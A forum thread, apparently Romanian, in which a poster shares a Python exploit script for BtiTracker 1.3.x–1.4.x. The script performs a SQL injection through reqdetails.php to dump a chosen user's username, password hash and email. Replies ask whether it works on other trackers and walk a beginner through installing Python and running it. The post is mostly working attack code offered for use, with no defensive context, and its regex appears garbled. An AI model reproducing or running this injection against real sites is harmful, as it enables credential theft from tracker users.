Jump to content
Guest .TinKode.

BtiTracker 1.3.x – 1.4.x Exploit [Python]

Recommended Posts

Guest .TinKode.
Posted

#!/usr/bin/env python# 
################################################################################
# ______ ____ __ [ xpl0it ] #
#/\__ _\ /\ _`\ __/\ \__ #
#\/_/\ \/ ___\ \,\L\_\ __ ___ __ __ _ __ /\_\ \ ,_\ __ __ #
# \ \ \ /' _ `\/_\__ \ /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \ #
# \_\ \__/\ \/\ \/\ \L\ \/\ __//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ #
# /\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\ \ \_\ \__\\/`____ \ #
# \/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/ \/_/ \/_/\/__/ `/___/> \ #
# _________________ /\___/ #
# www.insecurity.ro \/__/ #
# #
################################################################################
# [ BtiTracker 1.3.X - 1.4.X Exploit ] #
# Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches #
# Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff #
################################################################################
# Because we care, we're security aware #
################################################################################

import sys, urllib2, re

if len(sys.argv) < 2:
print "==============================================================="
print "============== BtiTracker 1.3.X - 1.4.X Exploit ==============="
print "==============================================================="
print "= Discovered and coded by TinKode ="
print "= www.InSecurity.ro ="
print "= ="
print "= Local Command: ="
print "= ./isr.py [http://webshit] [ID] ="
print "= ="
print "==============================================================="
exit()

if len(sys.argv) < 3:
id = 1
else:
id = sys.argv[2]

shit = sys.argv[1]
if shit[-1:] != "/":
shit += "/"

url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"
print "\n"
print "============================================="
print "================= InSecurity ================"
print "============================================="

html = urllib2.urlopen(url).read()
slobod = re.findall(r"--(.*)\[0-9a-fA-F]{32})\.*)--", html)
if len(slobod) > 0:
print "ID : " + str(id)
print "Username : " + slobod[0][0]
print "Password : " + slobod[0][1]
print "EMail : " + slobod[0][2]
print "============================================="
print "================= InSecurity ================"
print "============================================="
else:
print "Ai luat-o la gaoaza..."

#InSecurity.ro - Romania

Source: BtiTracker 1.3.X - 1.4.X Exploit

Posted
si parola ?:)

L.E: am observat ca si parola si emailul :-j .. functioneaza oare pe orice tracker ? chiar si pe filelist? :o:O

Merge doar pe trackerele care folosesc BtiTracker.Filelist nu e unul dintre ele:)

Posted

Descarca asta: http://downloads.activestate.com/ActivePython/releases/2.6.5.12/ActivePython-2.6.5.12-win32-x86.msi

Intrii in cmd, mergi in directorul in care ai instalat python folosind "cd", copiezi in acel directorul exploitul, pui extensia ".py", apoi rulezi "python exploit.py". Parca asa era cu Active Python.

Pff, dar mai bine lasa, mai intai sa prinzi notiunile de baza, apoi treci la folosirea exploiturilor. Oricum sunt tutoriale despre cum sa faci asta.

Posted
Nytro nu am inteles mai nimic din ce ai zis:D Dar oricum...acuma trebuie sa invat notiuunile de baza

Cum de te-ai prins? Era greu sa cauti pe google ".py extension" sa vezi ca se refera la extensia care o foloseste limbajul de programare Python? Dupa care cautai "Python Programming Language" si invatai limbajul de programare sau aruncai un ochi peste.

Data viitoare foloseste Google si nu mai pune intrebari stupide! Foloseste-ti creierul.

Si stai linistit(a), am revenit.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...